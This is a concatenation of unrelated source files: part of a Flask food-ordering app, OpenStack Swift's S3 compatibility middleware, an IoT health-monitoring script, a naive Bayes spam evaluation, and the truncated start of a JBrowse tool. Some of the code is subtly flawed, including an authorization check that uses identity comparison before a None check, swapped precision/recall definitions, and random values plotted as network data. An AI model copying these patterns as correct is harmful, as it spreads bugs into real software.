if order.location:
form.populate(order.location)
if order.is_closed():
form = None
total_price = sum([o.price for o in order.items])
debts = sum([o.price for o in order.items if not o.paid])
dish = order.location.dish_by_id(dish_id) if order.location else None
return render_template(
"order.html",
order=order,
form=form,
total_price=total_price,
debts=debts,
selected_dish=dish,
)
@order_bp.route("/<order_id>/items")
def items_shop_view(order_id: int) -> str:
"Generate order items view from id"
order = Order.query.filter(Order.id == order_id).first()
if order is None:
abort(404)
if current_user.is_anonymous() and not order.public:
flash("Please login to see this order.", "info")
abort(401)
total_price = sum([o.price for o in order.items])
return render_template("order_items.html", order=order, total_price=total_price)
@order_bp.route("/<order_id>/edit", methods=["GET", "POST"])
@login_required
def order_edit(order_id: int) -> typing.Union[str, Response]:
"Generate order edit view from id"
order = Order.query.filter(Order.id == order_id).first()
if current_user.id is not order.courier_id and not current_user.is_admin():
abort(401)
if order is None:
abort(404)
orderForm = OrderForm(obj=order)
orderForm.populate()
if orderForm.validate_on_submit():
orderForm.populate_obj(order)
order.update_from_hlds()
db.session.commit()
return redirect(url_for("order_bp.order_from_id", order_id=order.id))
return render_template("order_edit.html", form=orderForm, order_id=order_id)
@order_bp.route("/<order_id>/create", methods=["GET", "POST"])
def order_item_create(order_id: int) -> typing.Any:
# type is 'typing.Union[str, Response]', but this errors due to
# https://github.com/python/mypy/issues/7187
"Add item to order from id"
current_order = Order.query.filter(Order.id == order_id).first()
if current_order is None:
abort(404)
if current_order.is_closed():
abort(404)
if current_user.is_anonymous() and not current_order.public:
flash("Please login to see this order.", "info")
abort(401)
location = current_order.location
# If location doesn't exist any more, adding items is nonsensical
if not location:
abort(404)
form = AnonOrderItemForm() if current_user.is_anonymous() else OrderItemForm()
dish_id = request.form["dish_id"] if form.is_submitted() else request.args.get("dish")
if dish_id and not location.dish_by_id(dish_id):
abort(404)
if not form.is_submitted():
form.dish_id.data = dish_id
form.populate(current_order.location)
if form.is_submitted():
form_for_dish = request.form["dish_id"]
dish_was_changed = form_for_dish != "" and form_for_dish != dish_id
# The form's validation tests that dish_id is valid and gives a friendly error if it's not
choices = location.dish_by_id(form.dish_id.data).choices
chosen = [
(
choice.option_by_id(request.form.get("choice_" + choice.id))
if choice_type == "single_choice"
else list(
ignore_none(
request.form.getlist(
"choice_" + choice.id, type=choice.option_by_id
)
)
)
)
for (choice_type, choice) in choices
]
all_choices_present = all(x is not None for x in chosen)
if dish_was_changed or not all_choices_present:
try:
user_name = (
form.user_name.data if form.user_name.validate(form) else None
)
except AttributeError:
user_name = None
comment = form.comment.data if form.comment.validate(form) else None
return redirect(
url_for(
"order_bp.order_item_create",
order_id=order_id,
dish=form.dish_id.data,
user_name=user_name,
comment=comment,
)
)
# If the form was not submitted (GET request) or the form had errors: show form again
if not form.validate_on_submit():
return order_from_id(order_id, form=form, dish_id=dish_id)
# Form was submitted and is valid
item = OrderItem()
form.populate_obj(item)
item.hlds_data_version = location_definition_version
item.order_id = order_id
if not current_user.is_anonymous():
item.user_id = current_user.id
else:
session["anon_name"] = item.user_name
# XXX Temporary until OrderItemChoice is used
def _name(option):
no_text_tag = "no_text"
try:
if not option or no_text_tag in option.tags:
return None
return option.name
except AttributeError:
return ", ".join(o.name for o in option if no_text_tag not in o.tags)
comments = list(ignore_none(_name(option) for option in chosen))
if item.comment:
comments.append("Comment: " + item.comment)
item.comment = "; ".join(comments)
item.update_from_hlds()
# XXX Temporary until OrderItemChoice is used. Move this price calculation to update_from_hlds
# when in OrderItemChoice is in place.
def _price(option):
try:
return option.price or 0
except AttributeError:
return sum(o.price or 0 for o in option)
item.price += sum(_price(option) for option in chosen)
db.session.add(item)
db.session.commit()
flash("Ordered %s" % (item.dish_name), "success")
return redirect(url_for("order_bp.order_from_id", order_id=order_id))
@order_bp.route("/<order_id>/<user_name>/user_paid", methods=["POST"])
@login_required
# pylint: disable=R1710
def items_user_paid(order_id: int, user_name: str) -> typing.Optional[Response]:
"Indicate payment status for a user in an order"
user = User.query.filter(User.username == user_name).first()
items: typing.List[OrderItem] = []
if user:
items = OrderItem.query.filter(
(OrderItem.user_id == user.id) & (OrderItem.order_id == order_id)
).all()
else:
items = OrderItem.query.filter(
(OrderItem.user_name == user_name) & (OrderItem.order_id == order_id)
).all()
current_order = Order.query.filter(Order.id == order_id).first()
if current_order.courier_id == current_user.id or current_user.admin:
for item in items:
item.paid = True
db.session.commit()
flash("Paid %d items for %s" % (len(items), item.for_name), "success")
return redirect(url_for("order_bp.order_from_id", order_id=order_id))
abort(404)
@order_bp.route("/<order_id>/<item_id>/delete", methods=["POST"])
# pylint: disable=R1710
def delete_item(order_id: int, item_id: int) -> typing.Any:
# type is 'typing.Optional[Response]', but this errors due to
# https://github.com/python/mypy/issues/7187
"Delete an item from an order"
item = OrderItem.query.filter(OrderItem.id == item_id).first()
user_id = None
if not current_user.is_anonymous():
user_id = current_user.id
if item.can_delete(order_id, user_id, session.get("anon_name", "")):
dish_name = item.dish_name
db.session.delete(item)
db.session.commit()
flash("Deleted %s" % (dish_name), "success")
return redirect(url_for("order_bp.order_from_id", order_id=order_id))
abort(404)
@order_bp.route("/<order_id>/volunteer", methods=["POST"])
@login_required
def volunteer(order_id: int) -> Response:
"Add a volunteer to an order"
order = Order.query.filter(Order.id == order_id).first()
if order is None:
abort(404)
if order.courier_id is None or order.courier_id == 0:
order.courier_id = current_user.id
db.session.commit()
flash("Thank you for volunteering!")
else:
flash("Volunteering not possible!")
return redirect(url_for("order_bp.order_from_id", order_id=order_id))
@order_bp.route("/<order_id>/close", methods=["POST"])
@login_required
def close_order(order_id: int) -> typing.Optional[Response]:
"Close an order"
order = Order.query.filter(Order.id == order_id).first()
if order is None:
abort(404)
if (
current_user.id == order.courier_id or current_user.is_admin()
) and not order.is_closed():
order.stoptime = datetime.now()
if order.courier_id == 0 or order.courier_id is None:
courier = select_user(order.items)
if courier is not None:
order.courier_id = courier.id
db.session.commit()
return redirect(url_for("order_bp.order_from_id", order_id=order_id))
return None
def select_user(items) -> typing.Optional[User]:
"Select a random user from those who are signed up for the order"
user = None
# remove non users
items = [i for i in items if i.user_id]
if not items:
return None
while user is None:
item = random.choice(items)
user = item.user
if user:
if random.randint(user.bias, 100) < 80:
user = None
return user
def get_orders(expression=None) -> typing.List[Order]:
"Give the list of all currently open and public Orders"
order_list: typing.List[OrderForm] = []
if expression is None:
expression = (datetime.now() > Order.starttime) & (
Order.stoptime
> datetime.now()
# pylint: disable=C0121
) | (Order.stoptime == None)
if not current_user.is_anonymous():
order_list = Order.query.filter(expression).all()
else:
order_list = Order.query.filter(
# pylint: disable=C0121
(expression & (Order.public == True))
).all()
return order_list
| |
# Copyright (c) 2010-2014 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The s3api middleware will emulate the S3 REST api on top of swift.
To enable this middleware to your configuration, add the s3api middleware
in front of the auth middleware. See ``proxy-server.conf-sample`` for more
detail and configurable options.
To set up your client, ensure you are using the tempauth or keystone auth
system for swift project.
When your swift on a SAIO environment, make sure you have setting the tempauth
middleware configuration in ``proxy-server.conf``, and the access key will be
the concatenation of the account and user strings that should look like
test:tester, and the secret access key is the account password. The host should
also point to the swift storage hostname.
The tempauth option example:
.. code-block:: ini
[filter:tempauth]
use = egg:swift#tempauth
user_admin_admin = admin .admin .reseller_admin
user_test_tester = testing
An example client using tempauth with the python boto library is as follows:
.. code-block:: python
from boto.s3.connection import S3Connection
connection = S3Connection(
aws_access_key_id='test:tester',
aws_secret_access_key='testing',
port=8080,
host='127.0.0.1',
is_secure=False,
calling_format=boto.s3.connection.OrdinaryCallingFormat())
And if you using keystone auth, you need the ec2 credentials, which can
be downloaded from the API Endpoints tab of the dashboard or by openstack
ec2 command.
Here is showing to create an EC2 credential:
.. code-block:: console
# openstack ec2 credentials create
+------------+---------------------------------------------------+
| Field | Value |
+------------+---------------------------------------------------+
| access | c2e30f2cd5204b69a39b3f1130ca8f61 |
| links | {u'self': u'http://controller:5000/v3/......'} |
| project_id | 407731a6c2d0425c86d1e7f12a900488 |
| secret | baab242d192a4cd6b68696863e07ed59 |
| trust_id | None |
| user_id | 00f0ee06afe74f81b410f3fe03d34fbc |
+------------+---------------------------------------------------+
An example client using keystone auth with the python boto library will be:
.. code-block:: python
from boto.s3.connection import S3Connection
connection = S3Connection(
aws_access_key_id='c2e30f2cd5204b69a39b3f1130ca8f61',
aws_secret_access_key='baab242d192a4cd6b68696863e07ed59',
port=8080,
host='127.0.0.1',
is_secure=False,
calling_format=boto.s3.connection.OrdinaryCallingFormat())
----------
Deployment
----------
Proxy-Server Setting
^^^^^^^^^^^^^^^^^^^^
Set s3api before your auth in your pipeline in ``proxy-server.conf`` file.
To enable all compatibility currently supported, you should make sure that
bulk, slo, and your auth middleware are also included in your proxy
pipeline setting.
Using tempauth, the minimum example config is:
.. code-block:: ini
[pipeline:main]
pipeline = proxy-logging cache s3api tempauth bulk slo proxy-logging \
proxy-server
When using keystone, the config will be:
.. code-block:: ini
[pipeline:main]
pipeline = proxy-logging cache authtoken s3api s3token keystoneauth bulk \
slo proxy-logging proxy-server
Finally, add the s3api middleware section:
.. code-block:: ini
[filter:s3api]
use = egg:swift#s3api
.. note::
``keystonemiddleware.authtoken`` can be located before/after s3api but
we recommend to put it before s3api because when authtoken is after s3api,
both authtoken and s3token will issue the acceptable token to keystone
(i.e. authenticate twice). And in the ``keystonemiddleware.authtoken``
middleware , you should set ``delay_auth_decision`` option to ``True``.
-----------
Constraints
-----------
Currently, the s3api is being ported from https://github.com/openstack/swift3
so any existing issues in swift3 are still remaining. Please make sure
descriptions in the example ``proxy-server.conf`` and what happens with the
config, before enabling the options.
-------------
Supported API
-------------
The compatibility will continue to be improved upstream, you can keep and
eye on compatibility via a check tool build by SwiftStack. See
https://github.com/swiftstack/s3compat in detail.
"""
from cgi import parse_header
import json
from paste.deploy import loadwsgi
from swift.common.constraints import valid_api_version
from swift.common.middleware.listing_formats import \
MAX_CONTAINER_LISTING_CONTENT_LENGTH
from swift.common.wsgi import PipelineWrapper, loadcontext, WSGIContext
from swift.common.middleware.s3api.exception import NotS3Request, \
InvalidSubresource
from swift.common.middleware.s3api.s3request import get_request_class
from swift.common.middleware.s3api.s3response import ErrorResponse, \
InternalError, MethodNotAllowed, S3ResponseBase, S3NotImplemented
from swift.common.utils import get_logger, register_swift_info, \
config_true_value, config_positive_int_value, split_path, \
closing_if_possible
from swift.common.middleware.s3api.utils import Config
from swift.common.middleware.s3api.acl_handlers import get_acl_handler
class ListingEtagMiddleware(object):
def __init__(self, app):
self.app = app
def __call__(self, env, start_response):
# a lot of this is cribbed from listing_formats / swob.Request
if env['REQUEST_METHOD'] != 'GET':
# Nothing to translate
return self.app(env, start_response)
try:
v, a, c = split_path(env.get('SCRIPT_NAME', '') +
env['PATH_INFO'], 3, 3)
if not valid_api_version(v):
raise ValueError
except ValueError:
is_container_req = False
else:
is_container_req = True
if not is_container_req:
# pass through
return self.app(env, start_response)
ctx = WSGIContext(self.app)
resp_iter = ctx._app_call(env)
content_type = content_length = cl_index = None
for index, (header, value) in enumerate(ctx._response_headers):
header = header.lower()
if header == 'content-type':
content_type = value.split(';', 1)[0].strip()
if content_length:
break
elif header == 'content-length':
cl_index = index
try:
content_length = int(value)
except ValueError:
pass # ignore -- we'll bail later
if content_type:
break
if content_type != 'application/json' or content_length is None or \
content_length > MAX_CONTAINER_LISTING_CONTENT_LENGTH:
start_response(ctx._response_status, ctx._response_headers,
ctx._response_exc_info)
return resp_iter
# We've done our sanity checks, slurp the response into memory
with closing_if_possible(resp_iter):
body = b''.join(resp_iter)
try:
listing = json.loads(body)
for item in listing:
if 'subdir' in item:
continue
value, params = parse_header(item['hash'])
if 's3_etag' in params:
item['s3_etag'] = '"%s"' % params.pop('s3_etag')
item['hash'] = value + ''.join(
'; %s=%s' % kv for kv in params.items())
except (TypeError, KeyError, ValueError):
# If anything goes wrong above, drop back to original response
start_response(ctx._response_status, ctx._response_headers,
ctx._response_exc_info)
return [body]
body = json.dumps(listing).encode('ascii')
ctx._response_headers[cl_index] = (
ctx._response_headers[cl_index][0],
str(len(body)),
)
start_response(ctx._response_status, ctx._response_headers,
ctx._response_exc_info)
return [body]
class S3ApiMiddleware(object):
"""S3Api: S3 compatibility middleware"""
def __init__(self, app, conf, *args, **kwargs):
self.app = app
self.conf = Config()
# Set default values if they are not configured
self.conf.allow_no_owner = config_true_value(
conf.get('allow_no_owner', False))
self.conf.location = conf.get('location', 'us-east-1')
self.conf.dns_compliant_bucket_names = config_true_value(
conf.get('dns_compliant_bucket_names', True))
self.conf.max_bucket_listing = config_positive_int_value(
conf.get('max_bucket_listing', 1000))
self.conf.max_parts_listing = config_positive_int_value(
conf.get('max_parts_listing', 1000))
self.conf.max_multi_delete_objects = config_positive_int_value(
conf.get('max_multi_delete_objects', 1000))
self.conf.multi_delete_concurrency = config_positive_int_value(
conf.get('multi_delete_concurrency', 2))
self.conf.s3_acl = config_true_value(
conf.get('s3_acl', False))
self.conf.storage_domain = conf.get('storage_domain', '')
self.conf.auth_pipeline_check = config_true_value(
conf.get('auth_pipeline_check', True))
self.conf.max_upload_part_num = config_positive_int_value(
conf.get('max_upload_part_num', 1000))
self.conf.check_bucket_owner = config_true_value(
conf.get('check_bucket_owner', False))
self.conf.force_swift_request_proxy_log = config_true_value(
conf.get('force_swift_request_proxy_log', False))
self.conf.allow_multipart_uploads = config_true_value(
conf.get('allow_multipart_uploads', True))
self.conf.min_segment_size = config_positive_int_value(
conf.get('min_segment_size', 5242880))
self.conf.allowable_clock_skew = config_positive_int_value(
conf.get('allowable_clock_skew', 15 * 60))
self.logger = get_logger(
conf, log_route=conf.get('log_name', 's3api'))
self.check_pipeline(self.conf)
def __call__(self, env, start_response):
try:
req_class = get_request_class(env, self.conf.s3_acl)
req = req_class(env, self.conf, self.app)
resp = self.handle_request(req)
except NotS3Request:
resp = self.app
except InvalidSubresource as e:
self.logger.debug(e.cause)
except ErrorResponse as err_resp:
if isinstance(err_resp, InternalError):
self.logger.exception(err_resp)
resp = err_resp
except Exception as e:
self.logger.exception(e)
resp = InternalError(reason=str(e))
if isinstance(resp, S3ResponseBase) and 'swift.trans_id' in env:
resp.headers['x-amz-id-2'] = env['swift.trans_id']
resp.headers['x-amz-request-id'] = env['swift.trans_id']
if 's3api.backend_path' in env and 'swift.backend_path' not in env:
env['swift.backend_path'] = env['s3api.backend_path']
return resp(env, start_response)
def handle_request(self, req):
self.logger.debug('Calling S3Api Middleware')
try:
controller = req.controller(self.app, self.conf, self.logger)
except S3NotImplemented:
# TODO: Probably we should distinct the error to log this warning
self.logger.warning('multipart: No SLO middleware in pipeline')
raise
acl_handler = get_acl_handler(req.controller_name)(req, self.logger)
req.set_acl_handler(acl_handler)
if hasattr(controller, req.method):
handler = getattr(controller, req.method)
if not getattr(handler, 'publicly_accessible', False):
raise MethodNotAllowed(req.method,
req.controller.resource_type())
res = handler(req)
else:
raise MethodNotAllowed(req.method,
req.controller.resource_type())
return res
def check_pipeline(self, conf):
"""
Check that proxy-server.conf has an appropriate pipeline for s3api.
"""
if conf.get('__file__', None) is None:
return
ctx = loadcontext(loadwsgi.APP, conf.__file__)
pipeline = str(PipelineWrapper(ctx)).split(' ')
# Add compatible with 3rd party middleware.
self.check_filter_order(pipeline, ['s3api', 'proxy-server'])
auth_pipeline = pipeline[pipeline.index('s3api') + 1:
pipeline.index('proxy-server')]
# Check SLO middleware
if self.conf.allow_multipart_uploads and 'slo' not in auth_pipeline:
self.conf.allow_multipart_uploads = False
self.logger.warning('s3api middleware requires SLO middleware '
'to support multi-part upload, please add it '
'in pipeline')
if not conf.auth_pipeline_check:
self.logger.debug('Skip pipeline auth check.')
return
if 'tempauth' in auth_pipeline:
self.logger.debug('Use tempauth middleware.')
elif 'keystoneauth' in auth_pipeline:
self.check_filter_order(
auth_pipeline,
['s3token', 'keystoneauth'])
self.logger.debug('Use keystone middleware.')
elif len(auth_pipeline):
self.logger.debug('Use third party(unknown) auth middleware.')
else:
raise ValueError('Invalid pipeline %r: expected auth between '
's3api and proxy-server ' % pipeline)
def check_filter_order(self, pipeline, required_filters):
"""
Check that required filters are present in order in the pipeline.
"""
indexes = []
missing_filters = []
for required_filter in required_filters:
try:
indexes.append(pipeline.index(required_filter))
except ValueError as e:
self.logger.debug(e)
missing_filters.append(required_filter)
if missing_filters:
raise ValueError('Invalid pipeline %r: missing filters %r' % (
pipeline, missing_filters))
if indexes != sorted(indexes):
raise ValueError('Invalid pipeline %r: expected filter %s' % (
pipeline, ' before '.join(required_filters)))
def filter_factory(global_conf, **local_conf):
"""Standard filter factory to use the middleware with paste.deploy"""
conf = global_conf.copy()
conf.update(local_conf)
register_swift_info(
's3api',
# TODO: make default values as variables
max_bucket_listing=conf.get('max_bucket_listing', 1000),
max_parts_listing=conf.get('max_parts_listing', 1000),
max_upload_part_num=conf.get('max_upload_part_num', 1000),
max_multi_delete_objects=conf.get('max_multi_delete_objects', 1000),
allow_multipart_uploads=conf.get('allow_multipart_uploads', True),
min_segment_size=conf.get('min_segment_size', 5242880),
s3_acl=conf.get('s3_acl', False)
)
def s3api_filter(app):
return S3ApiMiddleware(ListingEtagMiddleware(app), conf)
return s3api_filter
| |
#!/usr/bin/python
import dweepy
import ConfigParser
import paho.mqtt.client as paho
import psutil
import signal
import sys
import time
import pyupm_grove as grove
import pyupm_i2clcd as lcd
from random import randint
from threading import Thread
from twython import Twython
import plotly.plotly as py
from plotly.graph_objs import Scatter, Layout, Figure, Data, Stream, YAxis
from tendo import singleton
def interruptHandler(signal, frame):
sys.exit(0)
def mqttClientHandler():
mqttclient = paho.Client()
mqttclient.on_publish = on_publish
mqttclient.connect("test.mosquitto.org", 1883, 60)
return mqttclient
def on_publish(mosq, obj, msg):
pass
def dataNetwork():
netdata = psutil.net_io_counters()
return netdata.packets_sent + netdata.packets_recv
def dataNetworkHandler(mqttclient):
idDevice = "ThisDevice"
while True:
packets = dataNetwork()
message = idDevice + " " + str(packets)
#print "MQTT dataNetworkHandler " + message
mqttclient.publish("IoT101/Demo", message)
time.sleep(1)
def on_message(mosq, obj, msg):
print "MQTT dataMessageHandler %s %s" % (msg.topic, msg.payload)
def dataMessageHandler():
mqttclient = paho.Client()
mqttclient.on_message = on_message
mqttclient.connect("test.mosquitto.org", 1883, 60)
mqttclient.subscribe("IoT101/Message", 0)
while mqttclient.loop() == 0:
pass
def dataPlotly():
return dataNetwork()
def dataPlotlyHandler():
configuration = ConfigParser.ConfigParser()
configuration.read('credentials.config')
username = configuration.get('plotly','username')
apikey = configuration.get('plotly','apikey')
streamtokentx = configuration.get('plotly','streamtokentx')
streamtokenrx = configuration.get('plotly','streamtokenrx')
py.sign_in(username, apikey)
trace_network_tx = Scatter(
x=[],
y=[],
stream=Stream(
token=streamtokentx,
),
yaxis='tx'
)
trace_network_rx = Scatter(
x=[],
y=[],
stream=Stream(
token=streamtokenrx,
),
yaxis='rx'
)
layout = Layout(
title='IoT Lab Network Health System',
yaxis=YAxis(
title='Bytes'
),
yaxis2=YAxis(
title='%',
side='right',
overlaying="y"
)
)
data = Data([trace_network_tx, trace_network_rx])
fig = Figure(data=data, layout=layout)
print py.plot(fig, filename='IoT Lab Network Health System', auto_open=False)
stream_network_tx = py.Stream(streamtokentx)
stream_network_tx.open()
stream_network_rx = py.Stream(streamtokenrx)
stream_network_rx.open()
counter = 0
while True:
output = psutil.net_io_counters()
randoma = randint(0,1000)
randomb = randint(0,1000)
stream_network_tx.write({'x': counter, 'y': randoma })
stream_network_rx.write({'x': counter, 'y': randomb })
counter += 1
time.sleep(0.25)
stream_network_tx.close()
stream_network_rx.close()
def twitterHandler():
configuration = ConfigParser.ConfigParser()
configuration.read('credentials.config')
consumer_key = configuration.get('twitter','consumer_key')
consumer_secret = configuration.get('twitter','consumer_secret')
access_token = configuration.get('twitter','access_token')
access_token_secret = configuration.get('twitter','access_token_secret')
twythonid = Twython(consumer_key, \
consumer_secret, \
access_token, \
access_token_secret)
return twythonid
def dataRotary(mqttclient):
knob = grove.GroveRotary(3)
myLcd = lcd.Jhd1313m1(0, 0x3E, 0x62)
twythonid = twitterHandler()
while True:
abs = knob.abs_value()
myLcd.setCursor(0,0)
myLcd.write('Health System')
myLcd.setColor(0, 128, 0)
myLcd.setCursor(1,0)
myLcd.write('Heart Rate %s' % abs)
while (abs > 950):
myLcd.setColor(255, 0, 0)
id = str(randint(0,1000))
status = "0x" + id + " #IoTLab Health System Heart Rate Warning " + str(abs)
mqttclient.publish("IoTPy/Buzzer", "None")
twythonid.update_status(status=status)
data = {}
data['alive'] = "1"
data['warning'] = "1"
data['message'] = status
dweepy.dweet_for('IoTHealthSystem', data)
time.sleep(1.5)
data['warning'] = "0"
data['message'] = ""
dweepy.dweet_for('IoTHealthSystem', data)
break
time.sleep(0.25)
if __name__ == '__main__':
me = singleton.SingleInstance()
mqttclient = mqttClientHandler()
signal.signal(signal.SIGINT, interruptHandler)
threadx = Thread(target=dataNetworkHandler, args=(mqttclient,))
threadx.start()
thready = Thread(target=dataMessageHandler)
thready.start()
threadz = Thread(target=dataPlotlyHandler)
threadz.start()
threada = Thread(target=dataRotary, args=(mqttclient,))
threada.start()
print "Internet of Things Lab - Health System"
button = grove.GroveButton(2)
data = {}
data['alive'] = "1"
data['warning'] = "0"
data['message'] = "No Message"
data['help'] = "All Ok"
dweepy.dweet_for('IoTHealthSystem', data)
counter = 1
while True:
while button.value():
data['help'] = "Help Needed! " + str(counter)
dweepy.dweet_for('IoTHealthSystem', data)
counter += 1
time.sleep(1)
time.sleep(0.1)
# End of File
| |
import numpy as np
import scipy.stats as stats
import sys
# lib eh a nossa biblioteca criada para este trabalho
import lib.naive_bayes as nb
import lib.preprocessing as prep
import lib.validation as valid
from config.constants import *
def case2(indexes=CASE_2_ATTRIBUTE_INDEXES,output=True):
accuracy_in_each_turn = list()
precision_in_each_turn_spam = list()
recall_in_each_turn_spam = list()
precision_in_each_turn_ham = list()
recall_in_each_turn_ham = list()
m = np.loadtxt(open("resources/normalized_data.csv","rb"),delimiter=',')
shuffled = np.random.permutation(m)
valid.validate_cross_validation(NUMBER_OF_ROUNDS,TRAIN_TEST_RATIO)
# equiprobable priors
prior_spam = 0.5
prior_ham = 0.5
for i in xrange(NUMBER_OF_ROUNDS):
# we're using cross-validation so each iteration we take a different
# slice of the data to serve as test set
train_set,test_set = prep.split_sets(shuffled,TRAIN_TEST_RATIO,i)
#parameter estimation
#but now we take 10 attributes into consideration
sample_means_word_spam = list()
sample_means_word_ham = list()
sample_variances_word_spam = list()
sample_variances_word_ham = list()
for attr_index in indexes:
sample_means_word_spam.append(nb.take_mean_spam(train_set,attr_index,SPAM_ATTR_INDEX))
sample_means_word_ham.append(nb.take_mean_ham(train_set,attr_index,SPAM_ATTR_INDEX))
sample_variances_word_spam.append(nb.take_variance_spam(train_set,attr_index,SPAM_ATTR_INDEX))
sample_variances_word_ham.append(nb.take_variance_ham(train_set,attr_index,SPAM_ATTR_INDEX))
#sample standard deviations from sample variances
sample_std_devs_spam = map(lambda x: x ** (1/2.0), sample_variances_word_spam)
sample_std_devs_ham = map(lambda x: x ** (1/2.0), sample_variances_word_ham)
hits = 0.0
misses = 0.0
#number of instances correctly evaluated as spam
correctly_is_spam = 0.0
#total number of spam instances
is_spam = 0.0
#total number of instances evaluated as spam
guessed_spam = 0.0
#number of instances correctly evaluated as ham
correctly_is_ham = 0.0
#total number of ham instances
is_ham = 0.0
#total number of instances evaluated as ham
guessed_ham = 0.0
# now we test the hypothesis against the test set
for row in test_set:
# ou seja, o produto de todas as prob. condicionais das palavras dada a classe
# eu sei que ta meio confuso, mas se olhar com cuidado eh bonito fazer isso tudo numa linha soh! =)
product_of_all_conditional_probs_spam = reduce(lambda acc,cur: acc * stats.norm(sample_means_word_spam[cur], sample_std_devs_spam[cur]).pdf(row[indexes[cur]]) , xrange(10), 1)
# nao precisa dividir pelo termo de normalizacao pois so queremos saber qual e o maior!
posterior_spam = prior_spam * product_of_all_conditional_probs_spam
product_of_all_conditional_probs_ham = reduce(lambda acc,cur: acc * stats.norm(sample_means_word_ham[cur], sample_std_devs_ham[cur]).pdf(row[indexes[cur]]) , xrange(10), 1)
posterior_ham = prior_ham * product_of_all_conditional_probs_ham
# whichever is greater - that will be our prediction
if posterior_spam > posterior_ham:
guess = 1
else:
guess = 0
if(row[SPAM_ATTR_INDEX] == guess):
hits += 1
else:
misses += 1
# we'll use these to calculate metrics
if (row[SPAM_ATTR_INDEX] == 1 ):
is_spam += 1
if guess == 1:
guessed_spam += 1
correctly_is_spam += 1
else:
guessed_ham += 1
else:
is_ham += 1
if guess == 1:
guessed_spam += 1
else:
guessed_ham += 1
correctly_is_ham += 1
#accuracy = number of correctly evaluated instances/
# number of instances
#
#
accuracy = hits/(hits+misses)
#precision_spam = number of correctly evaluated instances as spam/
# number of spam instances
#
#
# in order to avoid divisions by zero in case nothing was found
if(is_spam == 0):
precision_spam = 0
else:
precision_spam = correctly_is_spam/is_spam
#recall_spam = number of correctly evaluated instances as spam/
# number of evaluated instances como spam
#
#
# in order to avoid divisions by zero in case nothing was found
if(guessed_spam == 0):
recall_spam = 0
else:
recall_spam = correctly_is_spam/guessed_spam
#precision_ham = number of correctly evaluated instances as ham/
# number of ham instances
#
#
# in order to avoid divisions by zero in case nothing was found
if(is_ham == 0):
precision_ham = 0
else:
precision_ham = correctly_is_ham/is_ham
#recall_ham = number of correctly evaluated instances as ham/
# number of evaluated instances como ham
#
#
# in order to avoid divisions by zero in case nothing was found
if(guessed_ham == 0):
recall_ham = 0
else:
recall_ham = correctly_is_ham/guessed_ham
accuracy_in_each_turn.append(accuracy)
precision_in_each_turn_spam.append(precision_spam)
recall_in_each_turn_spam.append(recall_spam)
precision_in_each_turn_ham.append(precision_ham)
recall_in_each_turn_ham.append(recall_ham)
# calculation of means for each metric at the end
mean_accuracy = np.mean(accuracy_in_each_turn)
std_dev_accuracy = np.std(accuracy_in_each_turn)
variance_accuracy = np.var(accuracy_in_each_turn)
mean_precision_spam = np.mean(precision_in_each_turn_spam)
std_dev_precision_spam = np.std(precision_in_each_turn_spam)
variance_precision_spam = np.var(precision_in_each_turn_spam)
mean_recall_spam = np.mean(recall_in_each_turn_spam)
std_dev_recall_spam = np.std(recall_in_each_turn_spam)
variance_recall_spam = np.var(recall_in_each_turn_spam)
mean_precision_ham = np.mean(precision_in_each_turn_ham)
std_dev_precision_ham = np.std(precision_in_each_turn_ham)
variance_precision_ham = np.var(precision_in_each_turn_ham)
mean_recall_ham = np.mean(recall_in_each_turn_ham)
std_dev_recall_ham = np.std(recall_in_each_turn_ham)
variance_recall_ham = np.var(recall_in_each_turn_ham)
if output:
print "\033[1;32m"
print '============================================='
print 'CASE 2 - TEN ATTRIBUTES - USING NORMAL MODEL'
print '============================================='
print "\033[00m"
print 'MEAN ACCURACY: '+str(round(mean_accuracy,5))
print 'STD. DEV. OF ACCURACY: '+str(round(std_dev_accuracy,5))
print 'VARIANCE OF ACCURACY: '+str(round(variance_accuracy,8))
print ''
print 'MEAN PRECISION FOR SPAM: '+str(round(mean_precision_spam,5))
print 'STD. DEV. OF PRECISION FOR SPAM: '+str(round(std_dev_precision_spam,5))
print 'VARIANCE OF PRECISION FOR SPAM: '+str(round(variance_precision_spam,8))
print ''
print 'MEAN RECALL FOR SPAM: '+str(round(mean_recall_spam,5))
print 'STD. DEV. OF RECALL FOR SPAM: '+str(round(std_dev_recall_spam,5))
print 'VARIANCE OF RECALL FOR SPAM: '+str(round(variance_recall_spam,8))
print ''
print 'MEAN PRECISION FOR HAM: '+str(round(mean_precision_ham,5))
print 'STD. DEV. OF PRECISION FOR HAM: '+str(round(std_dev_precision_ham,5))
print 'VARIANCE OF PRECISION FOR HAM: '+str(round(variance_precision_ham,8))
print ''
print 'MEAN RECALL FOR HAM: '+str(round(mean_recall_ham,5))
print 'STD. DEV. OF RECALL FOR HAM: '+str(round(std_dev_recall_ham,5))
print 'VARIANCE OF RECALL FOR HAM: '+str(round(variance_recall_ham,8))
case2()
| |
#!/usr/bin/env python
import argparse
import codecs
import copy
import hashlib
import json
import logging
import os
import shutil
import struct
import subprocess
import tempfile
import xml.etree.ElementTree as ET
from collections import defaultdict
from Bio.Data import CodonTable
logging.basicConfig(level=logging.INFO)
log = logging.getLogger('jbrowse')
class ColorScaling(object):
COLOR_FUNCTION_TEMPLATE = """
function(feature, variableName, glyphObject, track) {{
var score = {score};
{opacity}
return 'rgba({red}, {green}, {blue}, ' + opacity + ')';
}}
"""
COLOR_FUNCTION_TEMPLATE_QUAL = """
function(feature, variableName, glyphObject, track) {{
var search_up = function self(sf, attr){{
if(sf.get(attr) !== undefined){{
return sf.get(attr);
}}
if(sf.parent() === undefined) {{
return;
}}else{{
return self(sf.parent(), attr);
}}
}};
var search_down = function self(sf, attr){{
if(sf.get(attr) !== undefined){{
return sf.get(attr);
}}
if(sf.children() === undefined) {{
return;
}}else{{
var kids = sf.children();
for(var child_idx in kids){{
var x = self(kids[child_idx], attr);
if(x !== undefined){{
return x;
}}
}}
return;
}}
}};
var color = ({user_spec_color} || search_up(feature, 'color') || search_down(feature, 'color') || {auto_gen_color});
var score = (search_up(feature, 'score') || search_down(feature, 'score'));
{opacity}
var result = /^#?([a-f\d]{{2}})([a-f\d]{{2}})([a-f\d]{{2}})$/i.exec(color);
